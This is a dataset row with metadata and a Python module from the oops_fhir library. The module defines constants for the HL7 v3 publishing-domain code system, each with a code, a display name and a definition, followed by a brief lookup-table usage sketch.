| qsc_code_cate_autogen | 0 | 0 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0.033898 | 0 |
| qsc_code_frac_chars_long_word_length | 0 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0 | 0 |
| qsc_codepython_cate_var_zero | true | 1 |
| qsc_codepython_frac_lines_pass | 0 | 0 |
| qsc_codepython_frac_lines_import | 0.5 | 1 |
| qsc_codepython_frac_lines_simplefunc | 0 | 0 |
| qsc_codepython_score_lines_no_logic | 0.5 | 0 |
| qsc_codepython_frac_lines_print | 0 | 0 |
**Row 6**

| Field | Value |
|---|---|
| hexsha | `9d28de2e6a686f99d079c4403430d7ba7a43ca46` |
| size | 49,990 |
| ext | py |
| lang | Python |
| avg_line_length | 72.344428 |
| max_line_length | 815 |
| alphanum_fraction | 0.697319 |

| View | Repo path | Repo name | Head hexsha | Licenses | Count | First event | Last event |
|---|---|---|---|---|---|---|---|
| max_stars | oops_fhir/r4/code_system/v3_hl7_publishing_domain.py | Mikuana/oops_fhir | 77963315d123756b7d21ae881f433778096a1d25 | ["MIT"] | null | null | null |
| max_issues | oops_fhir/r4/code_system/v3_hl7_publishing_domain.py | Mikuana/oops_fhir | 77963315d123756b7d21ae881f433778096a1d25 | ["MIT"] | null | null | null |
| max_forks | oops_fhir/r4/code_system/v3_hl7_publishing_domain.py | Mikuana/oops_fhir | 77963315d123756b7d21ae881f433778096a1d25 | ["MIT"] | null | null | null |

`content` (verbatim from the preview, which dropped the class body's leading indentation):

```python
from pathlib import Path
from fhir.resources.codesystem import CodeSystem
from oops_fhir.utils import CodeSystemConcept
__all__ = ["v3hl7PublishingDomain"]
_resource = CodeSystem.parse_file(Path(__file__).with_suffix(".json"))
class v3hl7PublishingDomain:
"""
v3 Code System hl7PublishingDomain
Description: Codes for HL7 publishing domains (specific content area)
Status: active - Version: 2018-08-12
Copyright None
http://terminology.hl7.org/CodeSystem/v3-hl7PublishingDomain
"""
ab = CodeSystemConcept(
{
"code": "AB",
"definition": 'Description: Represents the HL7 content "domain" that supports accounting and billing functions - and "provides support for the creation and management of patient billing accounts and the post of financial transactions against patient billing accounts for the purpose of aggregating financial transactions that will be submitted as claims or invoices for reimbursemen"\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "accounting & billing",
}
)
"""
accounting & billing
Description: Represents the HL7 content "domain" that supports accounting and billing functions - and "provides support for the creation and management of patient billing accounts and the post of financial transactions against patient billing accounts for the purpose of aggregating financial transactions that will be submitted as claims or invoices for reimbursemen"
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
ai = CodeSystemConcept(
{
"code": "AI",
"definition": 'Description: Represents the HL7 content "domain" that supports trigger event control act infrastructure - and "covers the alternate factory of the message Trigger Event Control Acts in the HL7 Composite Message."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "trigger event control act infrastructure",
}
)
"""
trigger event control act infrastructure
Description: Represents the HL7 content "domain" that supports trigger event control act infrastructure - and "covers the alternate factory of the message Trigger Event Control Acts in the HL7 Composite Message."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
al = CodeSystemConcept(
{
"code": "AL",
"definition": 'Description: Represents the HL7 content "domain" that was defined as an "artificial listing" domain to support publication testing.',
"display": "artificial listing for test purposes - faux Domain for testing",
}
)
"""
artificial listing for test purposes - faux Domain for testing
Description: Represents the HL7 content "domain" that was defined as an "artificial listing" domain to support publication testing.
"""
bb = CodeSystemConcept(
{
"code": "BB",
"definition": 'Description: Represents the HL7 content "domain" that supports blood tissue and organ domain - and "comprises the models, messages, and other artIfacts that are needed to support messaging related to the process of blood, tissue, and organ banking operations such as donations, eligibility, storage, dispense, administration/transfusion, explantation, and implantation. "\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "blood tissue and organ",
}
)
"""
blood tissue and organ
Description: Represents the HL7 content "domain" that supports blood tissue and organ domain - and "comprises the models, messages, and other artIfacts that are needed to support messaging related to the process of blood, tissue, and organ banking operations such as donations, eligibility, storage, dispense, administration/transfusion, explantation, and implantation. "
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
cd = CodeSystemConcept(
{
"code": "CD",
"definition": 'Description: Represents the HL7 content "domain" that supports the clinical document architecture.\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "clinical document architecture",
}
)
"""
clinical document architecture
Description: Represents the HL7 content "domain" that supports the clinical document architecture.
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
cg = CodeSystemConcept(
{
"code": "CG",
"definition": 'Description: Represents the HL7 content "domain" that supports clinical genomics - and includes " standards to enable the exchange of interrelated clinical and personalized genomic data between interested parties."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "clinical genomics",
}
)
"""
clinical genomics
Description: Represents the HL7 content "domain" that supports clinical genomics - and includes " standards to enable the exchange of interrelated clinical and personalized genomic data between interested parties."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
ci = CodeSystemConcept(
{
"code": "CI",
"definition": 'Description: Represents the HL7 content "domain" that supports transmission infrastructure - and " is primarily concerned with the data content of exchanges between healthcare applications, the sequence or interrelationships in the flow of messages and the communication of significant application level exceptions or error conditions."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "transmission infrastructure",
}
)
"""
transmission infrastructure
Description: Represents the HL7 content "domain" that supports transmission infrastructure - and " is primarily concerned with the data content of exchanges between healthcare applications, the sequence or interrelationships in the flow of messages and the communication of significant application level exceptions or error conditions."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
co = CodeSystemConcept(
{
"code": "CO",
"definition": 'Description: Represents the HL7 content "domain" that supports Coverage - and provides support for managing health care coverage in the reimbursement system(s).\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "coverage",
}
)
"""
coverage
Description: Represents the HL7 content "domain" that supports Coverage - and provides support for managing health care coverage in the reimbursement system(s).
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
cp = CodeSystemConcept(
{
"code": "CP",
"definition": 'Description: Represents the HL7 content "domain" that supports the common product model - which "is used to improve the alignment between the different representations of products used within the body of HL7 Version 3 models."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "common product model",
}
)
"""
common product model
Description: Represents the HL7 content "domain" that supports the common product model - which "is used to improve the alignment between the different representations of products used within the body of HL7 Version 3 models."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
cr = CodeSystemConcept(
{
"code": "CR",
"definition": 'Description: Represents the HL7 content "domain" that supports Claims and Reimbursement - and "provides support for Generic, Pharmacy, Preferred Accommodation, Physician, Oral Health Vision Care and Hospital claims for eligibility, authorization, coverage extension, pre-determination, invoice adjudication, payment advice and Statement of Financial Activity (SOFA) Release 3 of this document adds claims messaging support for Physician, Oral Health Vision Care and Hospital claims."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "claims and reimbursement",
}
)
"""
claims and reimbursement
Description: Represents the HL7 content "domain" that supports Claims and Reimbursement - and "provides support for Generic, Pharmacy, Preferred Accommodation, Physician, Oral Health Vision Care and Hospital claims for eligibility, authorization, coverage extension, pre-determination, invoice adjudication, payment advice and Statement of Financial Activity (SOFA) Release 3 of this document adds claims messaging support for Physician, Oral Health Vision Care and Hospital claims."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
cs = CodeSystemConcept(
{
"code": "CS",
"definition": 'Description: Represents the HL7 content "domain" that supports a common clinical statement pattern - and "is a \'pattern\' designed to be used within multiple HL7 Version 3 domain models. This pattern is intended to facilitate the consistent design of communications that convey clinical information to meet specific use cases."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "clinical statement",
}
)
"""
clinical statement
Description: Represents the HL7 content "domain" that supports a common clinical statement pattern - and "is a 'pattern' designed to be used within multiple HL7 Version 3 domain models. This pattern is intended to facilitate the consistent design of communications that convey clinical information to meet specific use cases."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
ct = CodeSystemConcept(
{
"code": "CT",
"definition": 'Description: Represents the HL7 content "domain" that supports common model types - and "are a work product produced by a particular committee for expressing a common, useful and reusable concept."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "common types",
}
)
"""
common types
Description: Represents the HL7 content "domain" that supports common model types - and "are a work product produced by a particular committee for expressing a common, useful and reusable concept."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
dd = CodeSystemConcept(
{
"code": "DD",
"definition": 'Description: Represents the HL7 content "domain" that was created to support testing and initial set-up functions.',
"display": "dummy domain",
}
)
"""
dummy domain
Description: Represents the HL7 content "domain" that was created to support testing and initial set-up functions.
"""
di = CodeSystemConcept(
{
"code": "DI",
"definition": 'Description: This domain has been retired in favor of "imaging integration" (II).',
"display": "diagnostic imaging",
}
)
"""
diagnostic imaging
Description: This domain has been retired in favor of "imaging integration" (II).
"""
ds = CodeSystemConcept(
{
"code": "DS",
"definition": 'Description: Represents the HL7 content "domain" that provides decision support.\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "decision support",
}
)
"""
decision support
Description: Represents the HL7 content "domain" that provides decision support.
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
em = CodeSystemConcept(
{
"code": "EM",
"definition": 'Description: Represents the HL7 content "domain" that supports Emergency Medical Services.\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "emergency medical services",
}
)
"""
emergency medical services
Description: Represents the HL7 content "domain" that supports Emergency Medical Services.
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
ii = CodeSystemConcept(
{
"code": "II",
"definition": 'Description: Represents the HL7 content "domain" that supports imaging integration - and is "comprises the models, implementation guides, sample documents and images that are needed to illustrate the transformation of DICOM structured reports to CDA Release 2 as well as the creation of CDA diagnostic imaging reports."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "imaging integration",
}
)
"""
imaging integration
Description: Represents the HL7 content "domain" that supports imaging integration - and is "comprises the models, implementation guides, sample documents and images that are needed to illustrate the transformation of DICOM structured reports to CDA Release 2 as well as the creation of CDA diagnostic imaging reports."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
iz = CodeSystemConcept(
{
"code": "IZ",
"definition": 'Description: Represents the HL7 content "domain" that supports immunization - and "describes communication of information about immunization: the administration of vaccines (and/or antisera) to individuals to prevent infectious disease."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "immunization",
}
)
"""
immunization
Description: Represents the HL7 content "domain" that supports immunization - and "describes communication of information about immunization: the administration of vaccines (and/or antisera) to individuals to prevent infectious disease."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
lb = CodeSystemConcept(
{
"code": "LB",
"definition": 'Description: Represents the HL7 content "domain" that supports clinical laboratory functions - and is "comprises the models, messages, and other artifacts that are needed to support messaging related to laboratory tests or observations. "\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "laboratory",
}
)
"""
laboratory
Description: Represents the HL7 content "domain" that supports clinical laboratory functions - and is "comprises the models, messages, and other artifacts that are needed to support messaging related to laboratory tests or observations. "
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
me = CodeSystemConcept(
{
"code": "ME",
"definition": 'Description: Represents the HL7 content "domain" that supports medication - and "deals with the description of a medicine for the purposes of messaging information about medicines" and the applications of these descriptions.\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "medication",
}
)
"""
medication
Description: Represents the HL7 content "domain" that supports medication - and "deals with the description of a medicine for the purposes of messaging information about medicines" and the applications of these descriptions.
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
mi = CodeSystemConcept(
{
"code": "MI",
"definition": 'Description: Represents the HL7 content "domain" that supports master file infrastructure - and is "comprises the classes and attributes needed to support Master Files and Registries."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "masterfile infrastructure",
}
)
"""
masterfile infrastructure
Description: Represents the HL7 content "domain" that supports master file infrastructure - and is "comprises the classes and attributes needed to support Master Files and Registries."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
mm = CodeSystemConcept(
{
"code": "MM",
"definition": 'Description: Represents the HL7 content "domain" that supports Materials Management - and is "supports the simple scenario of a Materials Management application sending requests, notifications and queries to an auxiliary application. The intent is to establish a standard for the minimum functionality that is useful and comprehensive enough to explore the important concepts relative to inventory management."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "materials management",
}
)
"""
materials management
Description: Represents the HL7 content "domain" that supports Materials Management - and is "supports the simple scenario of a Materials Management application sending requests, notifications and queries to an auxiliary application. The intent is to establish a standard for the minimum functionality that is useful and comprehensive enough to explore the important concepts relative to inventory management."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
mr = CodeSystemConcept(
{
"code": "MR",
"definition": 'Description: Represents the HL7 content "domain" that supports medical records - and is "supports clinical document management, and document querying."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "medical records",
}
)
"""
medical records
Description: Represents the HL7 content "domain" that supports medical records - and is "supports clinical document management, and document querying."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
mt = CodeSystemConcept(
{
"code": "MT",
"definition": 'Description: Represents the HL7 content "domain" that supports shared messages - and "are a work product produced for expressing common, useful and reusable message types."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "shared messages",
}
)
"""
shared messages
Description: Represents the HL7 content "domain" that supports shared messages - and "are a work product produced for expressing common, useful and reusable message types."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
ob = CodeSystemConcept(
{
"code": "OB",
"definition": 'Description: Represents the HL7 content "domain" that supports observations - and is "comprises the models, messages, and other artifacts that are needed to support messaging related to resulting basic healthcare diagnostic services. "\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "observations",
}
)
"""
observations
Description: Represents the HL7 content "domain" that supports observations - and is "comprises the models, messages, and other artifacts that are needed to support messaging related to resulting basic healthcare diagnostic services. "
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
oo = CodeSystemConcept(
{
"code": "OO",
"definition": 'Description: Represents the HL7 content "domain" that supports orders and observations - and will provide over-arching support information for the "Orders" (OR) and "Observations" (OB) domains.\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "orders & observations",
}
)
"""
orders & observations
Description: Represents the HL7 content "domain" that supports orders and observations - and will provide over-arching support information for the "Orders" (OR) and "Observations" (OB) domains.
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
or_ = CodeSystemConcept(
{
"code": "OR",
"definition": 'Description: Represents the HL7 content "domain" that supports orders - and "comprises the models, messages, and other artifacts that are needed to support messaging related to ordering basic healthcare services."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "orders",
}
)
"""
orders
Description: Represents the HL7 content "domain" that supports orders - and "comprises the models, messages, and other artifacts that are needed to support messaging related to ordering basic healthcare services."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
pa = CodeSystemConcept(
{
"code": "PA",
"definition": 'Description: Represents the HL7 content "domain" that supports Patient Administration - and "defines person and patient demographics and visit information about patients"\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "patient administration",
}
)
"""
patient administration
Description: Represents the HL7 content "domain" that supports Patient Administration - and "defines person and patient demographics and visit information about patients"
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
pc = CodeSystemConcept(
{
"code": "PC",
"definition": 'Description: Represents the HL7 content "domain" that supports Care Provision - and "addresses the information that is needed for the ongoing care of individuals, populations, and other targets of care."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "care provision",
}
)
"""
care provision
Description: Represents the HL7 content "domain" that supports Care Provision - and "addresses the information that is needed for the ongoing care of individuals, populations, and other targets of care."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
ph = CodeSystemConcept(
{
"code": "PH",
"definition": 'Description: Represents the HL7 content "domain" that supports public health - and is "the source of a number of Common Model Element Types (CMET) designed to meet the needs of public health data exchange."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "public health",
}
)
"""
public health
Description: Represents the HL7 content "domain" that supports public health - and is "the source of a number of Common Model Element Types (CMET) designed to meet the needs of public health data exchange."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
pm = CodeSystemConcept(
{
"code": "PM",
"definition": 'Description: Represents the HL7 content "domain" that supports Personnel Management - and "spans a variety of clinical-administrative information functions associated with the organizations, individuals, animals and devices involved in the delivery and support of healthcare services."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "personnel management",
}
)
"""
personnel management
Description: Represents the HL7 content "domain" that supports Personnel Management - and "spans a variety of clinical-administrative information functions associated with the organizations, individuals, animals and devices involved in the delivery and support of healthcare services."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
qi = CodeSystemConcept(
{
"code": "QI",
"definition": 'Description: Represents the HL7 content "domain" that supports query infrastructure - and "specifies the formation of information queries and the responses to these queries to meet the needs of healthcare applications using the HL7 version 3 messaging standard."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "query infrastructure",
}
)
"""
query infrastructure
Description: Represents the HL7 content "domain" that supports query infrastructure - and "specifies the formation of information queries and the responses to these queries to meet the needs of healthcare applications using the HL7 version 3 messaging standard."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
qm = CodeSystemConcept(
{
"code": "QM",
"definition": 'Description: Represents the HL7 content "domain" that supports Quality Measures - and "is a standard for representing a health quality measure as an electronic document."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "quality measures",
}
)
"""
quality measures
Description: Represents the HL7 content "domain" that supports Quality Measures - and "is a standard for representing a health quality measure as an electronic document."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
rg = CodeSystemConcept(
{
"code": "RG",
"definition": 'Description: Represents the HL7 content "domain" that supports Registries - and "collects HL7 artifacts for administrative registries."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "registries",
}
)
"""
registries
Description: Represents the HL7 content "domain" that supports Registries - and "collects HL7 artifacts for administrative registries."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
ri = CodeSystemConcept(
{
"code": "RI",
"definition": 'Description: Represents the HL7 content "domain" that supports Informative Public Health.\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "informative public health",
}
)
"""
informative public health
Description: Represents the HL7 content "domain" that supports Informative Public Health.
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
rp = CodeSystemConcept(
{
"code": "RP",
"definition": 'Description: Represents the HL7 content "domain" that supports Regulated Products - and "includes standards developed as part of the family of messages targeted for the exchange of information about regulated products and the exchange of the data needed to provide approval for such products."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "regulated products",
}
)
"""
regulated products
Description: Represents the HL7 content "domain" that supports Regulated Products - and "includes standards developed as part of the family of messages targeted for the exchange of information about regulated products and the exchange of the data needed to provide approval for such products."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
rr = CodeSystemConcept(
{
"code": "RR",
"definition": 'Description: Represents the HL7 content "domain" that supports Public Health Reporting - and "includes messages and documents that are specifically designed to support managment, reporting and investigation in the public health context."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "public health reporting",
}
)
"""
public health reporting
Description: Represents the HL7 content "domain" that supports Public Health Reporting - and "includes messages and documents that are specifically designed to support managment, reporting and investigation in the public health context."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
rt = CodeSystemConcept(
{
"code": "RT",
"definition": 'Description: Represents the HL7 content "domain" that supports Regulated Studies - and is "includes standards developed as part of the family of messages targeted for the exchange of information about the conduct of regulated studies, and the exchange of the data collected during those studies."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "regulated studies",
}
)
"""
regulated studies
Description: Represents the HL7 content "domain" that supports Regulated Studies - and is "includes standards developed as part of the family of messages targeted for the exchange of information about the conduct of regulated studies, and the exchange of the data collected during those studies."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
rx = CodeSystemConcept(
{
"code": "RX",
"definition": 'Description: Represents the HL7 content "domain" that supports pharmacy - and is a "model used to derive message patterns to describe and communicate processes related to medication."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "pharmacy",
}
)
"""
pharmacy
Description: Represents the HL7 content "domain" that supports pharmacy - and is a "model used to derive message patterns to describe and communicate processes related to medication."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
sc = CodeSystemConcept(
{
"code": "SC",
"definition": 'Description: Represents the HL7 content "domain" that supports Scheduling - and "offers a generic set of messages and behavior to implement any number of Scheduling scenarios."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "scheduling",
}
)
"""
scheduling
Description: Represents the HL7 content "domain" that supports Scheduling - and "offers a generic set of messages and behavior to implement any number of Scheduling scenarios."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
sp = CodeSystemConcept(
{
"code": "SP",
"definition": 'Description: Represents the HL7 content "domain" that supports Specimen - and "comprises the models and artifacts that are needed to support the creation of messaging related to specimen."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "specimen",
}
)
"""
specimen
Description: Represents the HL7 content "domain" that supports Specimen - and "comprises the models and artifacts that are needed to support the creation of messaging related to specimen."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
td = CodeSystemConcept(
{
"code": "TD",
"definition": 'Description: Represents the HL7 content "domain" that supports Therapeutic Devices - and "comprises the models, messages, and other artifacts that are needed to support messaging related to therapy delivery and observations made by a medical device."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "therapeutic devices",
}
)
"""
therapeutic devices
Description: Represents the HL7 content "domain" that supports Therapeutic Devices - and is "comprises the models, messages, and other artifacts that are needed to support messaging related to therapy delivery and observations made by a medical device. "
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
class Meta:
resource = _resource
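Every constant in this class follows one shape: a CodeSystemConcept wrapping a dict with "code", "display", and (optionally) "definition" keys, so the concepts can be folded into ordinary lookup tables. A minimal runnable sketch, assuming nothing beyond the constructor pattern visible above; the stand-in class below is hypothetical, not the real CodeSystemConcept API:

# Hypothetical stand-in: mirrors only the dict-wrapping constructor pattern
# seen above; the real CodeSystemConcept may expose a different interface.
class CodeSystemConcept:
    def __init__(self, data):
        self.code = data["code"]
        self.display = data["display"]
        self.definition = data.get("definition", "")

sc = CodeSystemConcept({"code": "SC", "display": "scheduling"})
sp = CodeSystemConcept({"code": "SP", "display": "specimen"})

# Fold the concept constants into a code -> display lookup table.
display_by_code = {c.code: c.display for c in (sc, sp)}
assert display_by_code["SC"] == "scheduling"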
